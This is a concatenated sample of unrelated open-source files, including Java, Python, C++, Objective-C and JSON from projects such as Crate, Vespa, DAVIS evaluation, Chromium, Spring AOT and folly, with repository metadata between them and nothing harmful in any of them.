#import <vector>
#import "CoreGraphicsInternal.h"
#include <objc/runtime.h>
size_t _CGGradientGetCount(CGGradientRef gradient);
const std::vector<CGFloat>& _CGGradientGetStopLocations(CGGradientRef gradient);
const std::vector<CGFloat>& _CGGradientGetColorComponents(CGGradientRef gradient);
CGColorSpaceRef _CGGradientGetColorSpace(CGGradientRef gradient);
| 352
|
3,066
|
<reponame>skofra0/crate<gh_stars>1000+
/*
* Licensed to Crate.io GmbH ("Crate") under one or more contributor
* license agreements. See the NOTICE file distributed with this work for
* additional information regarding copyright ownership. Crate licenses
* this file to you under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License. You may
* obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations
* under the License.
*
* However, if you have executed another commercial license agreement
* with Crate these terms will supersede the license and you may use the
* software solely pursuant to the terms of the relevant commercial agreement.
*/
package io.crate.expression.scalar;
import org.hamcrest.core.IsSame;
import org.junit.Test;
import java.time.*;
import static io.crate.testing.Asserts.assertThrowsMatches;
import static org.hamcrest.core.IsNot.not;
public class DateBinFunctionTest extends ScalarTestCase {
private static final LocalDateTime FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE = LocalDate.of(2001, Month.JANUARY, 1).atStartOfDay();
private static final LocalDateTime FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE = LocalDate.of(1969, Month.JANUARY, 1).atStartOfDay();
@Test
public void test_interval_is_value_compile_gets_new_instance() {
assertCompile("date_bin('1 day' :: INTERVAL, timestamp, timestamp)", (s) -> not(IsSame.sameInstance(s)));
}
@Test
public void compile_on_null_interval_gets_same_instance() {
assertCompile("date_bin(null, timestamp, timestamp)", (s) -> IsSame.sameInstance(s));
}
@Test
public void test_at_least_one_arg_is_null_returns_null() {
assertEvaluate("date_bin(null, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP)", null);
assertEvaluate("date_bin('1 day' :: INTERVAL , null, CURRENT_TIMESTAMP)", null);
assertEvaluate("date_bin('1 day' :: INTERVAL , CURRENT_TIMESTAMP, null)", null);
}
@Test
public void test_interval_is_zero_exception_thrown() {
assertThrowsMatches(() -> assertEvaluate("date_bin('0 days' :: INTERVAL, CURRENT_TIMESTAMP, 0)", null),
IllegalArgumentException.class,
"Interval cannot be zero");
}
@Test
public void test_same_value_as_date_trunc() {
assertEvaluate("date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0) = DATE_TRUNC('day', CURRENT_TIMESTAMP)", true);
assertEvaluate("date_bin('1 week' :: INTERVAL, CURRENT_TIMESTAMP, '2001-01-01T00:00:00Z'::timestamp without time zone) " +
" = DATE_TRUNC('week', CURRENT_TIMESTAMP)", true);
}
@Test
public void test_called_twice_same_result() {
assertEvaluate("date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0) = date_bin('1 day' :: INTERVAL, CURRENT_TIMESTAMP, 0)",
true);
}
@Test
public void test_diff_magnitude_smaller_than_interval_magnitude_returns_beginning_of_the_bin() {
// This test checks case when abs(origin-ts) < abs(interval).
// origin < ts, beginning of the bin is origin for any sign of interval
long expected = FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE.toEpochSecond(ZoneOffset.UTC) * 1000;
assertEvaluate("date_bin('8 days'::interval, '2001-01-04 00:00:00' :: timestamp without time zone, " +
" '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
assertEvaluate("date_bin('-8 days'::interval, '2001-01-04 00:00:00' :: timestamp without time zone, " +
" '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
// ts < origin, beginning of the bin is origin - abs(interval)
long expected1 = LocalDate.of(2001, Month.JANUARY, 4).atStartOfDay().minusDays(8).toEpochSecond(ZoneOffset.UTC) * 1000;
assertEvaluate("date_bin('8 days'::interval, '2001-01-01 00:00:00' :: timestamp without time zone," +
" '2001-01-04 00:00:00' :: timestamp without time zone)", expected1);
assertEvaluate("date_bin('-8 days'::interval, '2001-01-01 00:00:00' :: timestamp without time zone," +
" '2001-01-04 00:00:00' :: timestamp without time zone)", expected1);
}
@Test
public void test_interval_any_sign_source_equal_to_origin_returns_origin() {
long expected = FIRST_JAN_2001_MIDNIGHT_UTC_AS_DATE.toEpochSecond(ZoneOffset.UTC) * 1000;
assertEvaluate("date_bin('7 weeks' :: INTERVAL, '2001-01-01 00:00:00' :: timestamp without time zone," +
" '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
assertEvaluate("date_bin('-7 weeks' :: INTERVAL, '2001-01-01 00:00:00' :: timestamp without time zone ," +
" '2001-01-01 00:00:00' :: timestamp without time zone)", expected);
}
@Test
public void test_interval_any_sign_timestamp_bigint() {
assertEvaluate("date_bin('3 days' :: INTERVAL, 86400000*4, 0)", 86400000 * 3L);
assertEvaluate("date_bin('-3 days' :: INTERVAL, 86400000*4, 0)", 86400000 * 3L);
}
@Test
public void test_interval_any_sign_timestamp_without_zone() {
// Timeline is split by 2 min intervals.
// Timestamp is midnight + 7 min and interval begin is midnight + 6 min
long expected = FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE.plusMinutes(6).toEpochSecond(ZoneOffset.UTC) * 1000;
assertEvaluate("date_bin('2 minutes' :: INTERVAL, '1969-01-01T00:07:00Z'::timestamp without time zone, 0)", expected);
assertEvaluate("date_bin('-2 minutes' :: INTERVAL, '1969-01-01T00:07:00Z'::timestamp without time zone, 0)", expected);
}
@Test
public void test_interval_any_sign_timestamp_with_zone() {
// Timeline is split by 4 hours intervals.
// Timestamp is 9 AM at UTC+2 and interval begin is 8 AM in UTC+2.
long expected = FIRST_JAN_1969_MIDNIGHT_UTC_AS_DATE
.plusHours(8) // 4k interval begin is 8AM
.toEpochSecond(ZoneOffset.ofHours(2)) * 1000;
assertEvaluate("date_bin('4 hours' :: INTERVAL, '1969-01-01T09:00:00+0200'::timestamp with time zone , TIMEZONE('+02:00', 0))", expected);
assertEvaluate("date_bin('-4 hours' :: INTERVAL, '1969-01-01T09:00:00+0200'::timestamp with time zone , TIMEZONE('+02:00', 0))", expected);
}
}
| 2,521
|
4,054
|
<reponame>Anlon-Burke/vespa
// Copyright Yahoo. Licensed under the terms of the Apache 2.0 license. See LICENSE in the project root.
package com.yahoo.vespa.flags;
import com.fasterxml.jackson.databind.JsonNode;
import com.fasterxml.jackson.databind.node.DoubleNode;
import javax.annotation.concurrent.Immutable;
/**
* @author freva
*/
@Immutable
public class UnboundDoubleFlag extends UnboundFlagImpl<Double, DoubleFlag, UnboundDoubleFlag> {
public UnboundDoubleFlag(FlagId id, double defaultValue) {
this(id, defaultValue, new FetchVector());
}
public UnboundDoubleFlag(FlagId id, Double defaultValue, FetchVector defaultFetchVector) {
super(id, defaultValue, defaultFetchVector,
new SimpleFlagSerializer<>(DoubleNode::new, JsonNode::isFloatingPointNumber, JsonNode::asDouble),
UnboundDoubleFlag::new, DoubleFlag::new);
}
}
| 316
|
567
|
import os
import sys
import numpy as np
import pandas
from time import time
from collections import defaultdict
from davis2017.evaluation import DAVISEvaluation
from davis2017 import utils
from davis2017.metrics import db_eval_boundary, db_eval_iou
davis_root = 'input_dir/ref'
methods_root = 'examples'
def test_task(task, gt_set, res_path, J_target=None, F_target=None, metric=('J', 'F')):
dataset_eval = DAVISEvaluation(davis_root=davis_root, gt_set=gt_set, task=task, codalab=True)
metrics_res = dataset_eval.evaluate(res_path, debug=False, metric=metric)
num_seq = len(list(dataset_eval.dataset.get_sequences()))
J = metrics_res['J'] if 'J' in metric else {'M': np.zeros(num_seq), 'R': np.zeros(num_seq), 'D': np.zeros(num_seq)}
F = metrics_res['F'] if 'F' in metric else {'M': np.zeros(num_seq), 'R': np.zeros(num_seq), 'D': np.zeros(num_seq)}
if gt_set == "val" or gt_set == "train" or gt_set == "test-dev":
sys.stdout.write("----------------Global results in CSV---------------\n")
g_measures = ['J&F-Mean', 'J-Mean', 'J-Recall', 'J-Decay', 'F-Mean', 'F-Recall', 'F-Decay']
final_mean = (np.mean(J["M"]) + np.mean(F["M"])) / 2. if 'J' in metric and 'F' in metric else 0
g_res = np.array([final_mean, np.mean(J["M"]), np.mean(J["R"]), np.mean(J["D"]), np.mean(F["M"]), np.mean(F["R"]), np.mean(F["D"])])
table_g = pandas.DataFrame(data=np.reshape(g_res, [1, len(g_res)]), columns=g_measures)
table_g.to_csv(sys.stdout, index=False, float_format="%0.3f")
if J_target is not None:
assert check_results_similarity(J, J_target), f'J {print_error(J, J_target)}'
if F_target is not None:
assert check_results_similarity(F, F_target), f'F {print_error(F, F_target)}'
return J, F
def check_results_similarity(target, result):
return np.isclose(np.mean(target['M']) - result[0], 0, atol=0.001) & \
np.isclose(np.mean(target['R']) - result[1], 0, atol=0.001) & \
np.isclose(np.mean(target['D']) - result[2], 0, atol=0.001)
def print_error(target, result):
return f'M:{np.mean(target["M"])} = {result[0]}\t' + \
f'R:{np.mean(target["R"])} = {result[1]}\t' + \
f'D:{np.mean(target["D"])} = {result[2]}'
def test_semisupervised_premvos():
method_path = os.path.join(methods_root, 'premvos')
print('Evaluating PREMVOS val')
J_val = [0.739, 0.831, 0.162]
F_val = [0.818, 0.889, 0.195]
test_task('semi-supervised', 'val', method_path, J_val, F_val)
print('Evaluating PREMVOS test-dev')
J_test_dev = [0.675, 0.768, 0.217]
F_test_dev = [0.758, 0.843, 0.206]
test_task('semi-supervised', 'test-dev', method_path, J_test_dev, F_test_dev)
print('\n')
def test_semisupervised_onavos():
method_path = os.path.join(methods_root, 'onavos')
print('Evaluating OnAVOS val')
J_val = [0.616, 0.674, 0.279]
F_val = [0.691, 0.754, 0.266]
test_task('semi-supervised', 'val', method_path, J_val, F_val)
print('Evaluating OnAVOS test-dev')
J_test_dev = [0.499, 0.543, 0.230]
F_test_dev = [0.557, 0.603, 0.234]
test_task('semi-supervised', 'test-dev', method_path, J_test_dev, F_test_dev)
print('\n')
def test_semisupervised_osvos():
method_path = os.path.join(methods_root, 'osvos')
print('Evaluating OSVOS val')
J_val = [0.566, 0.638, 0.261]
F_val = [0.639, 0.738, 0.270]
test_task('semi-supervised', 'val', method_path, J_val, F_val)
print('Evaluating OSVOS test-dev')
J_test_dev = [0.470, 0.521, 0.192]
F_test_dev = [0.548, 0.597, 0.198]
test_task('semi-supervised', 'test-dev', method_path, J_test_dev, F_test_dev)
print('\n')
def test_unsupervised_flip_gt():
print('Evaluating Unsupervised Permute GT')
method_path = os.path.join(methods_root, 'swap_gt')
if not os.path.isdir(method_path):
utils.generate_random_permutation_gt_obj_proposals(davis_root, 'val', method_path)
# utils.generate_random_permutation_gt_obj_proposals('test-dev', method_path)
J_val = [1, 1, 0]
F_val= [1, 1, 0]
test_task('unsupervised', 'val', method_path, J_val, F_val)
# test_task('unsupervised', 'test-dev', method_path, J_val, F_val)
def test_unsupervised_rvos():
print('Evaluating RVOS')
method_path = os.path.join(methods_root, 'rvos')
test_task('unsupervised', 'val', method_path)
# test_task('unsupervised', 'test-dev', method_path)
def test_unsupervsied_multiple_proposals(num_proposals=20, metric=('J', 'F')):
print('Evaluating Multiple Proposals')
method_path = os.path.join(methods_root, f'generated_proposals_{num_proposals}')
utils.generate_obj_proposals(davis_root, 'val', num_proposals, method_path)
# utils.generate_obj_proposals('test-dev', num_proposals, method_path)
test_task('unsupervised', 'val', method_path, metric=metric)
# test_task('unsupervised', 'test-dev', method_path, metric=metric)
def test_void_masks():
gt = np.zeros((2, 200, 200))
mask = np.zeros((2, 200, 200))
void = np.zeros((2, 200, 200))
gt[:, 100:150, 100:150] = 1
void[:, 50:100, 100:150] = 1
mask[:, 50:150, 100:150] = 1
assert np.mean(db_eval_iou(gt, mask, void)) == 1
assert np.mean(db_eval_boundary(gt, mask, void)) == 1
def benchmark_number_proposals():
number_proposals = [10, 15, 20, 30]
timing_results = defaultdict(dict)
for n in number_proposals:
time_start = time()
test_unsupervsied_multiple_proposals(n, 'J')
timing_results['J'][n] = time() - time_start
for n in number_proposals:
time_start = time()
test_unsupervsied_multiple_proposals(n)
timing_results['J_F'][n] = time() - time_start
print(f'Using J {timing_results["J"]}')
print(f'Using J&F {timing_results["J_F"]}')
# Using J {10: 156.45335865020752, 15: 217.91797709465027, 20: 282.0747673511505, 30: 427.6770250797272}
# Using J & F {10: 574.3529748916626, 15: 849.7542386054993, 20: 1123.4619634151459, 30: 1663.6704666614532}
# Codalab
# Using J & F {10: 971.196366071701, 15: 1473.9757001399994, 20: 1918.787559747696, 30: 3007.116141319275}
if __name__ == '__main__':
# Test void masks
test_void_masks()
# Test semi-supervised methods
test_semisupervised_premvos()
test_semisupervised_onavos()
test_semisupervised_osvos()
# Test unsupervised methods
test_unsupervised_flip_gt()
# test_unsupervised_rvos()
test_unsupervsied_multiple_proposals()
| 2,937
|
385
|
/*
*
* Copyright (c) Microsoft. All rights reserved.
* Licensed under the MIT license.
*
* Project Oxford: http://ProjectOxford.ai
*
* Project Oxford Mimicker Alarm Github:
* https://github.com/Microsoft/ProjectOxford-Apps-MimickerAlarm
*
* Copyright (c) Microsoft Corporation
* All rights reserved.
*
* MIT License:
* Permission is hereby granted, free of charge, to any person obtaining
* a copy of this software and associated documentation files (the
* "Software"), to deal in the Software without restriction, including
* without limitation the rights to use, copy, modify, merge, publish,
* distribute, sublicense, and/or sell copies of the Software, and to
* permit persons to whom the Software is furnished to do so, subject to
* the following conditions:
*
* The above copyright notice and this permission notice shall be
* included in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND,
* EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
* MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
* NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
* LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
* OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
* WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*
*/
package com.microsoft.mimickeralarm.mimics;
import android.util.Log;
import android.view.View;
import java.lang.ref.WeakReference;
/**
* This class coordinates Mimic game state between the common UI controls:
* The countdown timer across the top of the screen
* The progress button which is used to capture images or audio
* The banner which animates across the screen giving user feedback
*
* This class should be instantiated in a Mimic game fragment. The fragment should
* implement IMimicImplementation and register itself and its controls with the class. This
* class implements the IMimicMediator interface
*
* The fragment should call into this class in the following cases:
* It should register the appropriate controls and itself
* The fragment onStart and onStop implementations should call start and stop
* All game failure/success cases must call into this class
*
* The fragment can optionally call the isMimicRunning method to determine whether to do any
* further processing.
*/
public class MimicStateManager implements IMimicMediator {
private static String TAG = "MimicStateManager";
MimicStateBanner mMimicStateBanner;
CountDownTimerView mCountDownTimer;
ProgressButton mProgressButton;
MimicButtonBehavior mButtonBehavior;
WeakReference<IMimicImplementation> mMimicRef;
boolean mMimicRunning;
// Should be called from Fragment::onStart, which is when it becomes visible to the user
public void start(){
Log.d(TAG, "Entered start!");
mMimicRunning = true;
mCountDownTimer.start();
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.initializeCapture();
}
}
// Should be called from Fragment::onStop, when the fragment is invisible
public void stop() {
Log.d(TAG, "Entered stop!");
mMimicRunning = false;
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.stopCapture();
}
mProgressButton.setReady();
}
public boolean isMimicRunning() {
return mMimicRunning;
}
public void onMimicSuccess(String successMessage) {
Log.d(TAG, "Entered onMimicSuccess!");
if (isMimicRunning()) {
handleButtonState();
mCountDownTimer.stop();
mMimicStateBanner.success(successMessage, new MimicStateBanner.Command() {
@Override
public void execute() {
Log.d(TAG, "Entered onMimicSuccess callback!");
if (isMimicRunning()) {
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.onSucceeded();
}
}
}
});
}
}
public void onMimicFailureWithRetry(String failureMessage) {
Log.d(TAG, "Entered onMimicFailureWithRetry!");
// If the countdown timer has just expired and has already registered a failure command,
// then we should avoid changing state
if (isMimicRunning() && !mCountDownTimer.hasExpired()) {
mCountDownTimer.pause();
mMimicStateBanner.failure(failureMessage, new MimicStateBanner.Command() {
@Override
public void execute() {
Log.d(TAG, "Entered onMimicFailureWithRetry callback!");
if (isMimicRunning()) {
mCountDownTimer.resume();
mProgressButton.setReady();
}
}
});
}
}
public void onMimicFailure(String failureMessage) {
Log.d(TAG, "Entered onMimicFailure!");
handleButtonState();
mCountDownTimer.stop();
mProgressButton.setClickable(false);
mMimicStateBanner.failure(failureMessage, new MimicStateBanner.Command() {
@Override
public void execute() {
Log.d(TAG, "Entered onMimicFailure callback!");
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.onFailed();
}
}
});
}
public void onMimicInternalError() {
Log.d(TAG, "Entered onMimicInternalError!");
handleButtonState();
mCountDownTimer.stop();
mProgressButton.setClickable(false);
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.onInternalError();
}
}
public void registerStateBanner(MimicStateBanner mimicStateBanner) {
mMimicStateBanner = mimicStateBanner;
}
public void registerCountDownTimer(CountDownTimerView countDownTimer, int timeout) {
mCountDownTimer = countDownTimer;
mCountDownTimer.init(timeout, new CountDownTimerView.Command() {
@Override
public void execute() {
Log.d(TAG, "Countdown timer expired!");
if (isMimicRunning()) {
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.stopCapture();
mimic.onCountDownTimerExpired();
}
}
}
});
}
public void registerProgressButton(ProgressButton progressButton,
MimicButtonBehavior buttonBehavior) {
mProgressButton = progressButton;
mButtonBehavior = buttonBehavior;
if (mButtonBehavior == MimicButtonBehavior.AUDIO) {
mProgressButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View view) {
if (mProgressButton.isReady()) {
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.startCapture();
}
mProgressButton.waiting();
} else {
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.stopCapture();
}
}
}
});
} else if (mButtonBehavior == MimicButtonBehavior.CAMERA) {
mProgressButton.setOnClickListener(new View.OnClickListener() {
@Override
public void onClick(View v) {
mCountDownTimer.pause();
mProgressButton.loading();
IMimicImplementation mimic = mMimicRef.get();
if (mimic != null) {
mimic.startCapture();
}
}
});
}
mProgressButton.setReady();
}
public void registerMimic(IMimicImplementation mimic) {
mMimicRef = new WeakReference<>(mimic);
}
private void handleButtonState() {
if (mButtonBehavior == MimicButtonBehavior.CAMERA) {
mProgressButton.stop();
}
}
}
| 3,800
|
322
|
<filename>app/i18n/locales/cs/dashboard.json
{
"welcome": "Vítejte",
"newNote": "Nová poznámka",
"settings": "Nastavení",
"about": "o aplikaci"
}
| 73
|
348
|
<filename>docs/data/leg-t2/027/02703516.json
{"nom":"Saint-Aubin-le-Vertueux","circ":"3ème circonscription","dpt":"Eure","inscrits":668,"abs":344,"votants":324,"blancs":6,"nuls":17,"exp":301,"res":[{"nuance":"MDM","nom":"<NAME>","voix":217},{"nuance":"FN","nom":"<NAME>","voix":84}]}
| 118
|
1,062
|
//
// Generated by class-dump 3.5b1 (64 bit) (Debug version compiled Dec 3 2019 19:59:57).
//
// Copyright (C) 1997-2019 <NAME>.
//
#import <MailFW/MFEWSNetworkTaskOperation.h>
@class MFEWSMailboxItemsBatch;
@protocol MFEWSFetchMessageMetadataOperationDelegate;
@interface MFEWSFetchMessageMetadataOperation : MFEWSNetworkTaskOperation
{
id <MFEWSFetchMessageMetadataOperationDelegate> _delegate; // 8 = 0x8
MFEWSMailboxItemsBatch *_batch; // 16 = 0x10
}
+ (id)_propertiesForItemClass:(Class)arg1; // IMP=0x000000000007ab5f
+ (id)_shapeForType:(Class)arg1; // IMP=0x000000000007aad4
@property(readonly, nonatomic) MFEWSMailboxItemsBatch *batch; // @synthesize batch=_batch;
@property(nonatomic) __weak id <MFEWSFetchMessageMetadataOperationDelegate> delegate; // @synthesize delegate=_delegate;
// - (void).cxx_destruct; // IMP=0x000000000007b6f7
- (void)main; // IMP=0x0000000000079dce
- (id)init; // IMP=0x0000000000079cf0
- (id)initWithBatch:(id)arg1; // IMP=0x0000000000079c82
@end
| 387
|
14,668
|
<reponame>zealoussnow/chromium
// Copyright 2019 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
#define CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
#include <string>
#include <vector>
#include "base/callback_forward.h"
#include "content/common/content_export.h"
#include "content/public/browser/content_index_provider.h"
#include "third_party/abseil-cpp/absl/types/optional.h"
#include "third_party/blink/public/mojom/content_index/content_index.mojom.h"
class SkBitmap;
namespace url {
class Origin;
} // namespace url
namespace content {
// Owned by the Storage Partition. This is used by the ContentIndexProvider to
// query auxiliary data for its entries from the right source.
class CONTENT_EXPORT ContentIndexContext {
public:
using GetAllEntriesCallback =
base::OnceCallback<void(blink::mojom::ContentIndexError,
std::vector<ContentIndexEntry>)>;
using GetEntryCallback =
base::OnceCallback<void(absl::optional<ContentIndexEntry>)>;
using GetIconsCallback = base::OnceCallback<void(std::vector<SkBitmap>)>;
ContentIndexContext() = default;
ContentIndexContext(const ContentIndexContext&) = delete;
ContentIndexContext& operator=(const ContentIndexContext&) = delete;
virtual ~ContentIndexContext() = default;
// Returns all available icons for the entry identified by
// |service_worker_registration_id| and |description_id|.
// The number of icons and the sizes are chosen by the ContentIndexProvider.
// Must be called on the UI thread. |callback| must be invoked on the UI
// the UI thread.
virtual void GetIcons(int64_t service_worker_registration_id,
const std::string& description_id,
GetIconsCallback callback) = 0;
// Must be called on the UI thread.
virtual void GetAllEntries(GetAllEntriesCallback callback) = 0;
// Must be called on the UI thread.
virtual void GetEntry(int64_t service_worker_registration_id,
const std::string& description_id,
GetEntryCallback callback) = 0;
// Called when a user deleted an item. Must be called on the UI thread.
virtual void OnUserDeletedItem(int64_t service_worker_registration_id,
const url::Origin& origin,
const std::string& description_id) = 0;
};
} // namespace content
#endif // CONTENT_PUBLIC_BROWSER_CONTENT_INDEX_CONTEXT_H_
| 928
|
1,027
|
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.alipay.remoting.rpc.userprocessor.multiinterestprocessor;
import java.io.Serializable;
/**
* @antuor muyun.cyt (<EMAIL>) 2018/7/5 11:20 AM
*/
public interface MultiInterestBaseRequestBody extends Serializable {
/**
* Getter method for property <tt>id</tt>.
*
* @return property value of id
*/
int getId();
/**
* Setter method for property <tt>id</tt>.
*
* @param id value to be assigned to property id
*/
void setId(int id);
/**
* Getter method for property <tt>msg</tt>.
*
* @return property value of msg
*/
String getMsg();
/**
* Setter method for property <tt>msg</tt>.
*
* @param msg value to be assigned to property msg
*/
void setMsg(String msg);
}
| 504
|
687
|
// Copyright 2021 The XLS Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
#include "xls/common/logging/check_ops.h"
#include <sstream>
#include "gmock/gmock.h"
#include "gtest/gtest.h"
#include "xls/common/casts.h"
namespace xls::logging_internal {
namespace {
TEST(CheckOpsTest, MessageBuilder) {
CheckOpMessageBuilder mb("foo");
std::ostream* os = mb.ForVar1();
auto* oss = down_cast<std::ostringstream*>(os);
EXPECT_EQ(oss->str(), "foo (");
EXPECT_EQ(mb.ForVar2(), os);
EXPECT_EQ(oss->str(), "foo ( vs. ");
std::unique_ptr<std::string> s(mb.NewString());
EXPECT_EQ(*s, "foo ( vs. )");
}
} // namespace
} // namespace xls::logging_internal
| 399
|
507
|
/*
* Copyright 2019-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.aot.context.bootstrap.generator.infrastructure;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.stream.Collectors;
import javax.lang.model.element.Modifier;
import com.squareup.javapoet.ClassName;
import com.squareup.javapoet.JavaFile;
import com.squareup.javapoet.ParameterizedTypeName;
import org.springframework.aot.context.bootstrap.generator.infrastructure.nativex.NativeConfigurationRegistry;
import org.springframework.context.ApplicationContextInitializer;
import org.springframework.context.support.GenericApplicationContext;
/**
* Context for components that write code to boostrap the context.
*
* @author <NAME>
*/
public class BootstrapWriterContext {
private final String packageName;
private final Function<String, BootstrapClass> bootstrapClassFactory;
private final ProtectedAccessAnalyzer protectedAccessAnalyzer;
private final Map<String, BootstrapClass> bootstrapClasses = new HashMap<>();
private final NativeConfigurationRegistry nativeConfigurationRegistry = new NativeConfigurationRegistry();
BootstrapWriterContext(String packageName, Function<String, BootstrapClass> bootstrapClassFactory) {
this.packageName = packageName;
this.bootstrapClassFactory = bootstrapClassFactory;
this.protectedAccessAnalyzer = new ProtectedAccessAnalyzer(this.packageName);
this.bootstrapClasses.put(packageName, bootstrapClassFactory.apply(packageName));
}
/**
* Create a context targeting the specified package name and using a unique name for
* all classes handled by this instance. The {@link BootstrapClass} for the main
* context is an {@link ApplicationContextInitializer} while the package protected
* boostrap classes are empty {@code public final} types.
* @param packageName the default package name
* @param className the name to use for bootstrap classes handled by this instance
*/
public BootstrapWriterContext(String packageName, String className) {
this(packageName, bootstrapClassFactory(packageName, className));
}
private static Function<String, BootstrapClass> bootstrapClassFactory(String defaultPackageName, String className) {
return (targetPackageName) -> {
if (targetPackageName.equals(defaultPackageName)) {
ParameterizedTypeName typeName = ParameterizedTypeName.get(ApplicationContextInitializer.class,
GenericApplicationContext.class);
return BootstrapClass.of(ClassName.get(targetPackageName, className), (type) ->
type.addSuperinterface(typeName).addModifiers(Modifier.PUBLIC));
}
else {
return BootstrapClass.of(ClassName.get(targetPackageName, className),
(type) -> type.addModifiers(Modifier.PUBLIC, Modifier.FINAL));
}
};
}
/**
* Return the package name in which the main bootstrap class is located.
* @return the default package name
*/
public String getPackageName() {
return this.packageName;
}
/**
* Return the {@link ProtectedAccessAnalyzer} to use.
* @return the protected access analyzer
*/
public ProtectedAccessAnalyzer getProtectedAccessAnalyzer() {
return this.protectedAccessAnalyzer;
}
/**
* Return a {@link BootstrapClass} for the specified package name. If it does not
* exist, it is created.
* @param packageName the package name to use
* @return the bootstrap class
*/
public BootstrapClass getBootstrapClass(String packageName) {
return this.bootstrapClasses.computeIfAbsent(packageName, this.bootstrapClassFactory);
}
/**
* Return the default {@link BootstrapClass}.
* @return the bootstrap class for the target package
* @see #getPackageName()
*/
public BootstrapClass getMainBootstrapClass() {
return getBootstrapClass(this.packageName);
}
/**
* Specify if a {@link BootstrapClass} for the specified package name is registered.
* @param packageName the package name to use
* @return {@code true} if the class is registered for that package
*/
public boolean hasBootstrapClass(String packageName) {
return this.bootstrapClasses.containsKey(packageName);
}
/**
* Return the list of {@link JavaFile} of known bootstrap classes.
* @return the java files of bootstrap classes in this instance
*/
public List<JavaFile> toJavaFiles() {
return this.bootstrapClasses.values().stream().map(BootstrapClass::toJavaFile).collect(Collectors.toList());
}
/**
* Return a {@link NativeConfigurationRegistry} for recording the necessary native
* configuration for this context
* @return the native configuration registry
*/
public NativeConfigurationRegistry getNativeConfigurationRegistry() {
return this.nativeConfigurationRegistry;
}
}
| 1,488
|
19,046
|
/*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#pragma once
#ifdef _MSC_VER
// This needs to be before the libevent include.
#include <folly/portability/Windows.h>
#endif
#include <event.h>
#ifdef _MSC_VER
#include <event2/event_compat.h> // @manual
// The signal_set macro from libevent 2 compat conflicts with the
// boost::asio::signal_set function
#undef signal_set
#include <folly/portability/Fcntl.h>
#endif
// The signal_set macro from libevent 1.4.14b-stable conflicts with the
// boost::asio::signal_set function
#if _EVENT_NUMERIC_VERSION == 0x01040e00
#undef signal_set
#endif
#include <folly/net/detail/SocketFileDescriptorMap.h>
namespace folly {
using libevent_fd_t = decltype(event::ev_fd);
} // namespace folly
| 408
|
590
|
<reponame>lmj0591/mygui
/*
* This source file is part of MyGUI. For the latest info, see http://mygui.info/
